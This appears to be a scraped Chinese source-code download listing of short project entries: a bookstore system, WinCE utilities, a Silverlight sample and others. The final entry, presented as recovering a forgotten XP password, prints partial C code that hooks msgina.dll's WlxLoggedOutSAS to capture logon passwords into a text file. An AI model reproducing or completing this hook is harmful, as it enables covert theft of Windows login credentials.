-
c# .NET 网上书店管理系统
.NET web 开发网上书店管理系统(前台和后台)源代码和数据库全部具有 ,开发工具Microsoft Visual Studio 2008+Microsoft SQL Server 2008,可以实现书籍管理,书籍购买,订单的处理等等模块。。。。。。。
- 2022-04-01 05:47:55下载
- 积分:1
-
Wiz97_demo.zip是一个简单的sheet页免设置的小程序
Wiz97_demo.zip是一个简单的sheet页免设置的小程序 -Wiz97_demo.zip is a simple-page-free set up sheet applet
- 2022-06-21 02:24:43下载
- 积分:1
-
探索构造法
探索构造法-Explore the construction method
- 2022-07-12 10:59:53下载
- 积分:1
-
wince 下播放声音软件,可以同时播放多通道的声音。
wince 下播放声音软件,可以同时播放多通道的声音。-wince the next play a sound software that can play both multi-channel sound.
- 2022-03-25 22:17:59下载
- 积分:1
-
示例自动完成框
AutoCompleteBox定义在 Silverlight 工具包,您可以找到其最新版本在这里。如果没有已经安装工具包,请从 http://developer.nokia.com/Community/Wiki/How_to_use_Auto_Complete_Box_in_Windows_Phone 按照安装说明进行安装。
- 2022-05-17 19:07:13下载
- 积分:1
-
vc中表格类,可用于报表,附样例
vc中表格类,可用于报表,附样例-vc category table can be used statements by Example
- 2022-01-21 06:21:15下载
- 积分:1
-
A wince under the LED control windows embedded visual c
一个wince下的LED控制
windows embedded visual c-A wince under the LED control windows embedded visual c
- 2022-07-28 05:16:24下载
- 积分:1
-
VB运行的所需要的运行文件.
VB运行的所需要的运行文件.-VB run by the need to document the operation.
- 2022-01-26 08:28:42下载
- 积分:1
-
AD single
AD系列单片机控制的A/D转换器,并把结果在液晶显示出来-AD single-chip A/D converters, and the results are displayed in the LCD
- 2023-05-29 10:10:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1